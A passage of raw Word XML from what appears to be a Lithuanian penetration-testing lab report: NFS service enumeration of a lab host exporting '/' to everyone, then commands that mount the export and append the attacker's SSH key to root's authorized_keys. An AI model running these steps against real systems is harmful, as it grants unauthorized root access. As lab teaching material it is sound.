    <w:p w14:paraId="327FB385" w14:textId="34C224C0" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3"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C77619" w:rsidRPr="00607DC0" w14:paraId="193C3C4C"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465D1FA2" w14:textId="77777777" w:rsidR="00C77619" w:rsidRPr="00607DC0" w:rsidRDefault="00C77619"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IP adresas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7D935BF8" w14:textId="77777777" w:rsidR="00C77619" w:rsidRPr="00607DC0" w:rsidRDefault="00C77619"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C77619" w:rsidRPr="00607DC0" w14:paraId="1CF4AC17" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="36E1E52F" w14:textId="259EC1FD" w:rsidR="00C77619" w:rsidRPr="00607DC0" w:rsidRDefault="006E1393" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E1393">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>192.168.177.128</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6497" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="16506B85"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100000    2   tcp    111  portmapper</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2639782D"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100000    2   udp    111  portmapper</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05C42C4B"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100024    1   udp  48297  status</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51E3F9D5"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100024    1   tcp  32999  status</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31F4503F"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2   udp   2049  nfs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04B761FF"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3   udp   2049  nfs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A3736B3"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4   udp   2049  nfs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="033A3A50"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1   udp  40818  nlockmgr</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BDBB4E6"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lastRenderedPageBreak/>
              <w:t xml:space="preserve">    100021    3   udp  40818  nlockmgr</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66B7D158"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4   udp  40818  nlockmgr</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34E6FC34"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2   tcp   2049  nfs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C662B90"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3   tcp   2049  nfs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16A1F088"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100003    4   tcp   2049  nfs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D95543E"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1   tcp  42273  nlockmgr</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44CDA943"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3   tcp  42273  nlockmgr</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20E347E8"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100021    4   tcp  42273  nlockmgr</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A4A5D95"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1   udp  41861  mountd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21F4EFDA"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1   tcp  34040  mountd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CA2460D"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2   udp  41861  mountd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="086641FC"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2   tcp  34040  mountd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55FE0B2E" w14:textId="7777777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    100005    3   udp  41861  mountd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1322110C" w14:textId="0DFFCB1E" w:rsidR="00C77619" w:rsidRPr="00607DC0" w:rsidRDefault="000B25C8" w:rsidP="000B25C8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B25C8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve">    100005    3   tcp  34040  mountd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77619" w:rsidRPr="00607DC0" w14:paraId="6962A9D3" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="717AA0B4" w14:textId="76B3CFD0" w:rsidR="00C77619" w:rsidRPr="00607DC0" w:rsidRDefault="00DD5B85" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD5B85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>192.168.177.128</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6497" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6A2F087B" w14:textId="7AEE5EE7" w:rsidR="000B25C8" w:rsidRPr="000B25C8" w:rsidRDefault="000B25C8" w:rsidP="000B25C8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B25C8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve">Export list for </w:t>
            </w:r>
            <w:r w:rsidR="00D16EED" w:rsidRPr="00D16EED">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>192.168.177.128</w:t>
            </w:r>
            <w:r w:rsidRPr="000B25C8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08741BFF" w14:textId="29653E03" w:rsidR="00C77619" w:rsidRPr="00607DC0" w:rsidRDefault="000B25C8" w:rsidP="000B25C8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B25C8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>/ *</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1708A595" w14:textId="41C4F1B6" w:rsidR="00C77619" w:rsidRPr="00607DC0" w:rsidRDefault="00C77619" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B79AFE1" w14:textId="77777777" w:rsidR="00C77619" w:rsidRPr="00607DC0" w:rsidRDefault="00C77619" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6816C2A4" w14:textId="5BFE25E9" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Tam, kad gauti prieigą prie sistemos su įrašymo teisę į failų sistemą reikia (dėl SSH veikiančios paslaugos) sukurti naują SSH raktą mūsų puolamoje sistemoje. Primontuoti NFS eksportą ir pridėti savo raktą į root </w:t>
      </w:r>
      <w:r w:rsidR="00876D9A" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>naudot</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ojo authorized_keys failą (susikurti raktus):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C35F8CD" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D96A78A" w14:textId="7A752441" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>root@li</w:t>
      </w:r>
      <w:r w:rsidR="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>nux</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:~#</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ssh-keygen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A63585" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Generating public/private rsa key pair.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6007BC" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Enter file in which to save the key (/root/.ssh/id_rsa):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351577A9" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Enter passphrase (empty for no passphrase):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139C695C" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Enter same passphrase again:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7282B587" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Your identification has been saved in /root/.ssh/id_rsa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7AE459" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Your public key has been saved in /root/.ssh/id_rsa.pub.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5496D7D0" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39E22A38" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">root@linux:~# </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>mkdir /tmp/r00t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347A7026" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">root@linux:~# </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>mount -t nfs IP:/ /tmp/r00t/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582D386C" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">root@linux:~# </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>cat ~/.ssh/id_rsa.pub &gt;&gt; /tmp/r00t/root/.ssh/authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DA602C" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">root@linux:~# </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>umount /tmp/r00t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761F9F03" w14:textId="074A6A86" w:rsidR="00B958F8" w:rsidRPr="00607DC0" w:rsidRDefault="00B958F8"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6637C1" w:rsidRPr="00607DC0" w14:paraId="107459CE"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613D0D31" w14:textId="0146B869" w:rsidR="006637C1" w:rsidRPr="00607DC0" w:rsidRDefault="006637C1"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7E2FF26E" w14:textId="77777777" w:rsidR="006637C1" w:rsidRPr="00607DC0" w:rsidRDefault="006637C1"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6637C1" w:rsidRPr="00607DC0" w14:paraId="013F2CC0" w14:textId="77777777" w:rsidTr="00584984">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5AA5E06B" w14:textId="599FE8DF" w:rsidR="006637C1" w:rsidRPr="00607DC0" w:rsidRDefault="00584984" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>ssh-keygen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6497" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="289F45A2" w14:textId="09FAD717" w:rsidR="006637C1" w:rsidRPr="00607DC0" w:rsidRDefault="007F24C5" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="771A3165" wp14:editId="42E5D7B1">
                  <wp:extent cx="4124325" cy="1272540"/>
                  <wp:effectExtent l="0" t="0" r="952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4325" cy="1272540"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006637C1" w:rsidRPr="00607DC0" w14:paraId="2271DA4A"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6FA46D81" w14:textId="63D54335" w:rsidR="006637C1" w:rsidRPr="00607DC0" w:rsidRDefault="00584984" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>mkdir /tmp/r00t</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6497" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1209F111" w14:textId="765D7E70" w:rsidR="006637C1" w:rsidRPr="00607DC0" w:rsidRDefault="007F24C5" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BC89003" wp14:editId="5849B0B5">
                  <wp:extent cx="1609725" cy="43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9725" cy="438150"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00584984" w:rsidRPr="00607DC0" w14:paraId="090A2896"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5998FC11" w14:textId="111884DB" w:rsidR="00584984" w:rsidRPr="00607DC0" w:rsidRDefault="00584984" w:rsidP="00584984">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>m</w:t>
            </w:r>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>ount</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve">-t nfs </w:t>
            </w:r>
            <w:r w:rsidR="0069502D" w:rsidRPr="0069502D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>192.168.177.128</w:t>
            </w:r>
            <w:r w:rsidRPr="0069502D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>:/</w:t>
            </w:r>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> /tmp/r00t/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6497" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5D0AF948" w14:textId="36D3E689" w:rsidR="00584984" w:rsidRDefault="007F24C5" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A3FD588" wp14:editId="7DEFB258">
                  <wp:extent cx="4010025" cy="904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0025" cy="904875"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00584984" w:rsidRPr="00607DC0" w14:paraId="72F4A56A"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594D7438" w14:textId="7E52FE67" w:rsidR="00584984" w:rsidRPr="00607DC0" w:rsidRDefault="00734D95" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00734D95">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>cat ./.ssh/id_rsa.pub &gt;&gt; /tmp/r00t/root/.ssh/authorized_keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6497" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0B706C3A" w14:textId="3D2238D7" w:rsidR="00584984" w:rsidRDefault="00734D95" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64EB68BE" wp14:editId="361E3CA8">
                  <wp:extent cx="4119245" cy="387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9245" cy="387350"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00734D95" w:rsidRPr="00607DC0" w14:paraId="2029E441" w14:textId="77777777" w:rsidTr="00584984">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
